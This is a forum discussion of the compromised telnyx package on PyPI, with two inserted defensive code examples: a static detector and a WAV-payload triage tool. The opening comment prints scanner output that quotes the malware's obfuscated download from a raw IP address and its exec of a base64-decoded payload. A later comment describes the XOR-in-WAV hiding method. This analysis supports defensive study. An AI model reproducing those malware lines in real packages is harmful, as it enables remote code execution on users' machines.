Discussion
Popular telnyx package compromised on PyPI by TeamPCP
f311a: They did not even try to hide the payload that much:

    hexora audit 4.87.1/2026-03-27-telnyx-v4.87.1.zip --min-confidence high --exclude HX4000

    warning[HX9000]: Potential data exfiltration with Decoded data via urllib.request.request.Request.
         ┌─ 2026-03-27-telnyx-v4.87.1.zip:tmp/tmp_79rk5jd/telnyx/telnyx/_client.py:7786:13
         │
    7783 │         except:
    7784 │             pass
    7785 │
    7786 │         r = urllib.request.Request(_d('aHR0cDovLzgzLjE0Mi4yMDkuMjAzOjgwODAvaGFuZ3VwLndhdg=='), headers={_d('VXNlci1BZ2VudA=='): _d('TW96aWxsYS81LjA=')})
         │             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX9000
    7787 │         with urllib.request.urlopen(r, timeout=15) as d:
    7788 │             with open(t, "wb") as f:
    7789 │                 f.write(d.read())
         │
         = Confidence: High
           Help: Data exfiltration is the unauthorized transfer of data from a computer.

    warning[HX4010]: Execution of obfuscated code.
         ┌─ 2026-03-27-telnyx-v4.87.1.zip:tmp/tmp_79rk5jd/telnyx/telnyx/_client.py:7810:9
         │
    7807 │       if os.name == 'nt':
    7808 │           return
    7809 │       try:
    7810 │ ╭         subprocess.Popen(
    7811 │ │             [sys.executable, "-c", f"import base64; exec(base64.b64decode('{_p}').decode())"],
    7812 │ │             stdout=subprocess.DEVNULL,
    7813 │ │             stderr=subprocess.DEVNULL,
    7814 │ │             start_new_session=True
    7815 │ │         )
         │ ╰─────────^ HX4010
    7816 │       except:
    7817 │           pass
    7818 │
         │
         = Confidence: VeryHigh
           Help: Obfuscated code exec can be used to bypass detection.
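Added example, not part of the comment above and not hexora's own code: a small AST-based check for the two patterns in that output, a network request built from decoded strings and a child interpreter told to `exec` decoded data. The decoder name list, the function names and the sample source are assumptions made for illustration; the sample is constructed and is only parsed, never run.

```python
import ast

DECODERS = {"b64decode", "a85decode", "unhexlify", "_d"}  # "_d": helper in the excerpt

def _name(node):
    """Dotted name of a call target, e.g. urllib.request.Request."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
    return ".".join(reversed(parts))

def _has_decoder(node):
    return any(isinstance(n, ast.Call) and _name(n.func).split(".")[-1] in DECODERS
               for n in ast.walk(node))

def _strings(node):
    """Literal text under a node, including the constant parts of f-strings."""
    return " ".join(n.value for n in ast.walk(node)
                    if isinstance(n, ast.Constant) and isinstance(n.value, str))

def scan(source):
    """Return sorted (line, reason) findings; the source is parsed, never executed."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        target, args = _name(node.func), node.args + [k.value for k in node.keywords]
        leaf = target.split(".")[-1]
        if leaf in ("Request", "urlopen") and any(_has_decoder(a) for a in args):
            findings.append((node.lineno, "network call built from decoded data"))
        elif target in ("exec", "eval") and any(_has_decoder(a) for a in args):
            findings.append((node.lineno, "exec/eval of decoded data"))
        elif leaf in ("Popen", "run", "call", "check_output"):
            text = " ".join(_strings(a) for a in args)
            if "exec(" in text and "decode" in text:
                findings.append((node.lineno, "child interpreter execs decoded code"))
    return sorted(findings)

# Constructed sample shaped like the flagged excerpt; placeholder values, never executed.
SAMPLE = '''\
import base64, subprocess, sys, urllib.request
r = urllib.request.Request(_d('cGxhY2Vob2xkZXI='), headers={'User-Agent': 'x'})
subprocess.Popen([sys.executable, "-c",
    f"import base64; exec(base64.b64decode('{_p}').decode())"])
ok = urllib.request.urlopen("https://example.invalid/")
'''
if __name__ == "__main__":
    print(scan(SAMPLE))
```

Working on the syntax tree rather than on text is what lets the check follow a decoder call nested inside an argument while leaving the plain `urlopen` on the last sample line unflagged.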
slowmovintarget: Telnyx provides voice capabilities for OpenClaw for those wondering.
carlsborg: Anthropic/OpenAI could own this space. They should offer a paid service that offers a mirror with LLM-scanned and sandbox-evaluated packages with their next-gen models. Free for individuals, orgs can subscribe to it.
oblvious-earth: OpenAI just acquired Astral who have an index service called pyx, so they would have a step up. My understanding though is most corporations that take security seriously either build everything themselves in a sandbox, or use something like JFrog's Artifactory with various security checks, and don't let users directly connect to public indexes. So I'm not sure what the market is.
oncallthrow: I think it's only a matter of time at this point before a devastating supply chain attack occurs. Supply-chain security is such a dumpster fire, and threat actors are realising that they can use LLMs to organize such attacks.
charcircuit: 2FA needs to be required for publishing packages. An attacker compromising someone's CI should not give them free rein to publish malicious packages at any time they want.
jbrowning: > The payload isn't delivered as a raw binary or a Python file. It's disguised as a .wav audio file.
> The WAV file is a valid audio file. It passes MIME-type checks. But the audio frame data contains a base64-encoded payload. Decode the frames, take the first 8 bytes as the XOR key, XOR the rest, and you have your executable or Python script.
Talk about burying the lede.
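Added example, not part of the comment above or of the quoted write-up: an offline triage helper that applies the quoted layout (base64 in the frame data, first 8 bytes as XOR key) to a WAV file and reports what the frames hold without running anything. The verdict labels, function names and both fixtures are constructed for illustration, and the fixture payload is a harmless `print` line.

```python
import base64, binascii, io, wave

MAGIC = {b"\x7fELF": "elf", b"MZ": "pe", b"#!": "script"}

def triage_wav(data: bytes):
    """Classify a WAV file's frame data; returns (verdict, decoded bytes or None)."""
    with wave.open(io.BytesIO(data), "rb") as w:
        frames = w.readframes(w.getnframes())
    try:
        # Real PCM samples almost never form a strictly valid base64 string.
        blob = base64.b64decode(frames.strip(b"\x00\r\n "), validate=True)
    except (binascii.Error, ValueError):
        return "audio", None
    if len(blob) <= 8:          # need an 8-byte key plus at least one payload byte
        return "audio", None
    key, body = blob[:8], blob[8:]
    plain = bytes(b ^ key[i % 8] for i, b in enumerate(body))
    for magic, verdict in MAGIC.items():
        if plain.startswith(magic):
            return verdict, plain
    try:
        compile(plain.decode("utf-8"), "<wav-frames>", "exec")  # parse only, never run
        return "python", plain
    except (UnicodeDecodeError, SyntaxError, ValueError):
        return "unknown", plain

def wav_bytes(frames: bytes) -> bytes:
    """Constructed fixture: wrap raw frame bytes in a mono 8-bit WAV container."""
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(1)
        w.setframerate(8000)
        w.writeframes(frames)
    return buf.getvalue()

def fixture(payload: bytes, key: bytes = b"constrct") -> bytes:
    """Constructed, harmless sample laid out the way the quoted write-up describes."""
    body = bytes(b ^ key[i % 8] for i, b in enumerate(payload))
    return wav_bytes(base64.b64encode(key + body))

CLEAN = wav_bytes(bytes(range(256)))
SAMPLE = fixture(b"print('constructed sample')\n")

if __name__ == "__main__":
    for name, wav in (("clean", CLEAN), ("sample", SAMPLE)):
        print(name, triage_wav(wav)[0])
```

A container or MIME check passes both fixtures, which is the point of the quoted passage: only the content of the frame data separates them.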
m000: Are there more tools like hexora?
dlcarrier: At this point, I'm not updating anything using Python. Not that I had the option anyway, because everything using Python breaks if you update it. You know they've given up on backward compatibility and version control, when the solution is: run everything in a VM, with its own installation. Apparently it's also needed for security, but the VMs aren't really set up to be secure. I don't get why everything math heavy uses it. I blame MATLAB for being so awful that it made Python look good. It's not even the language itself, not that it doesn't have its own issues, or the inefficient way it's executed, but the ecosystem around it is so made out of technical debt.
akx: Sounds like you're not familiar with https://docs.astral.sh/uv/ ...
jlundberg: We have always been API first rather than SDK first. Never really thought too much about the security implications but that is of course a benefit too. Main reasoning for us has been to aim for a really nice HTTP API rather than hide ugliness with an SDK on top.
johndough: Judging by curl shutting down its bug bounty program due to AI slop, a likely outcome would be that this mirror has no packages because they are all blocked by false positives.
f311a: GuardDog, but it's based on regexes
mil22: For those using uv, you can at least partially protect yourself against such attacks by adding this to your pyproject.toml:

    [tool.uv]
    exclude-newer = "7 days"

or this to your ~/.config/uv/uv.toml:

    exclude-newer = "7 days"

This will prevent uv picking up any package version released within the last 7 days, hopefully allowing enough time for the community to detect any malware and yank the package version before you install it.
firesteelrain: Own what space?
indigodaddy: They should add voip.ms. It's better all around I think
TZubiri: Nice feature. However uv is suspect at the moment, in the sense that it is designed as a pip replacement to overcome issues that only exist when supply chains are of a size that isn't safe to have. So any project that has UV and any developer that tries to get uv into a project is on average less safe than a project that just uses pip and a requirements.txt
sdoering: Sorry - call me uninformed. But I do not really understand how choosing uv makes me less safe than using pip. Care to explain? Would love to learn.
infinitewars: Is this happening in part due to the sheer volume of pull requests with AI-generated code... things are slipping through?
indigodaddy: Hah, need to set up a Grandstream HT801 this weekend and this cements my decision to use voip.ms vs telnyx. Not that the device would use that library (have no idea), but just, yeah generally, it's a good cue to stay away for me.
Imustaskforhelp: I really am not able to follow this line of reasoning, I am not sure if what you said makes sense and how it relates to uv having a security feature to be on average less safe :/
LoganDark: I used to use Telnyx many years ago, but was squeezed out when they started adding layer after layer of mandatory ID verification. Nope.
TZubiri: Agree. I was working on an open source package, noticed something weird, and noticed the size of the uv.lock and got a bit scared. It's a pandemic, I will be hardening my security, and rotating my keys just in case.
sigseg1v: but then how can we deploy our vibe coded PRs we didn't review at a pace of 40 deploys per day?
woodruffw: In a lot of cases, it's not really clear whose second factor would authorize publishing a package that was uploaded from a CI/CD system. Is it any project owner? Anyone from the same GitHub organization? etc.
> An attacker compromising someone's CI should not give them free rein to publish malicious packages at any time they want.
Agreed, that's why a lot of packaging ecosystems (including PyPI) have moved towards schemes that involve self-scoping, self-expiring tokens. The CI can still publish, but the attacker can no longer exfiltrate the publishing credential and use it indefinitely later. (These schemes are not mandatory, because they can't be.)
tomhow: Comments moved to https://news.ycombinator.com/item?id=47540388.